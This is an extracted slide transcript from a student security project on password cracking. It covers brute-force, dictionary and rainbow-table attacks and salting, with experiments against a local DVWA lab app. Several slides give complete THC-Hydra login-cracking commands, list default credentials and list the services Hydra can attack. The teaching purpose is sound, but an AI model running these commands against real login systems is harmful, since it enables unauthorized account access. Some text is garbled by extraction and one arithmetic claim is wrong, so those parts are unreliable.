cyber security project - unice.frdeptinfo.unice.fr/~bmartin/passwords.pdf · dvwa (damn vulnerable...
TRANSCRIPT
CYBER SECURITY PROJECTPASSWORD CRACKING
BALLERIO SIMONEGALASSO EMANUELE
Summary
2
Thc hydra
Password Cracking
Experiments
3
Password Cracking features
Online Attack Offline Attack
Dictionary Attack Brute Force
What is password cracking?
Raibow table Hybrid tecniques
4
Password cracking is the process of attempting to gain unauthorizedaccess to restricted systems using common passwords oralgorithms that guess passwords.
What is password cracking?
5
How is stored a Password?
PasswordHASH FUNCTION
Hashed Password
6
Online VS Offline Cracking
Try a large number of username/passwordcombinations against the login portal
limited by the speed of the network
Try to get the hash of the password inoffline situation and then crack themtrying to find the clear-text value thatcomputes to that hash.
Limited by the speed of the hacker’s machine
Brute Force Attack
7
Depends only on the length of the password and on the system used
Try all the possible combination of characters.
We are sure at 100% to find the password but we don’t know how longer will be the process.
Example Brute Force
8
Let’s consider for a moment to be in an environment where all the power of the systems are equal to each other, and consider that we should have to find a Password composed only by 8 alpha numeric characters. How many attempts do we have to do in the worst case?
PROBLEM
Consideration
Alpha numeric characters are: a...z, A...Z, 0...9 = 64 possibilities.
We already know the username.
The solution depends only on the length of the password.
Knowing the exactly length of the password always simplify the job.
Example Brute Force
9
SOLUTION
648 possible combinations (Disposition with ripetition 𝐷r𝑛𝑘 = 𝑛𝑘)
Dictionary Attack
10
Depends on the complexity of the password and on it’s no ordinary meaning.
Try all the strings in a pre-arranged listing.
There are less chance of arriving at a solution, but if we arrive is in relatively fast time.
Example Dictionary Attack
11
Let’s consider a Dictionary Attack with the French dictionary, where there are roughly 135.000 words.
PROBLEM
SolutionWe can found a common French Password just trying 135.000 times. .
Rainbow table Attack
12
It is a pre-computed dictionary of plain text passwords and their corresponding hash value.
More than one text can produce the same hash, it’s not important to know what the original password really was.
Salting passwords is a common method of preventing rainbow table attacks.
Salting Passwords
13
BOB ALICESAME PASSWORD = SAME HASH STORED
Hybrid Attack
14
Hybrid Dictionary
Background knowledge Dictionary
Maximize your chances of success
15
Experiments
16
Kali Linux is an advanced penetration testing distribution
Tools
Hydra is a parallelized login cracker
Damn VulnerableWeb App
17
Kali LinuxKali contains several hundred tools which are geared towards various information security tasks, such as:
Penetration Testing
Security research
Computer Forensics
Reverse Engineering
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
18
Hydra
• Is very fast and flexible
• New modules are easy to add
• Show how easy it would be to gain unauthorized access to a system remotely
19
DVWA (Damn Vulnerable Web App)
Ethical hackers test their skills and run tools in a legal environment.
• For beginners and advanced users to proof their skill DVWA is the best platform.
• This is the best place to do hacking.
• Helps web developer better understand the processes of securing web applications
20
Idea of Experiments
In the current experiments, a password cracking is proposed connected to thediscovery of the [user-password] pair relative to the access credentials located
within the DVWA special software program.
21
Brute Force
hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk
22
Brute Force
hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk
23
Brute Force
In this case it is not possible to show the solution because the password combinations are very high and therefore would take a long time.
24
Dictionary Attack
hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1 http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie : security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
25
Dictionary Attack
hydra –l admin -P rockyou.txt -e ns -F -u -w 10 -v-V 127.0.0.1 http -get -form "/DVWA/vulnerabilities/brute/:username =^USER^& password =^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie : security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
26
Dictionary Attack
• Low: This security level is completely vulnerable and has no securitymeasures at all.
• Medium: This setting is mainly to give an example to the user ofbad security practices, where the developer has tried but failed tosecure an application.
27
Dictionary Attack
29
Other Possible Experiments
THC-Hydra supports many different services:
• Afp• Cisco • Cvs• Firebird• Ftp• Http-get• Http-head• Http-proxy• Https-get
• Https-head• Https-form-get• Https-form-post• Imap• Smb• Ldap2• Ldap3• Mssql• Mysql
• Ncp• Nntp• Oracle-listener• Pcanywhere• Pop3• Postgres• Rexecsnmp• Smtp• Telnet
30
CONCLUSION
• Use passwords that are long at least 15 characters.
• Don't use the same password for privileged user accounts between systems.
• Don't share it.
31
Thanks for the attention
32
How to testVirtual box: https://www.virtualbox.org/wiki/Downloads
Kali linux : https://linoxide.com/distros/learn-method-install-
kali-linux-virtualbox/
DVWA installation: https://medium.com/datadriveninvestor/setup-install-dvwa-
into-your-linux-distribution-d76dc3b80357
If you have any type of problem during the installation contact us, and we will give you a .vdi file of the virtual machine with all the installations that you need.
33
How to test
34
How to test
Username: root
Password: toor
35
How to test
36
How to test
1. service apache2 start2. service mysql start
37
How to testhttp://127.0.0.1/DVWA/login.php
Username: admin
Password: password
38
How to test
1
2
3
39
How to testNOW YOU ARE IN THIS PAGE:
40
How to test
1
2(Select)3
Right-click:
How to test
Test it and have fun:hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"
Pure Brute Force:
hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"
Dictionary Attack:
Try: hydra -h , for more information
42
ENJOY!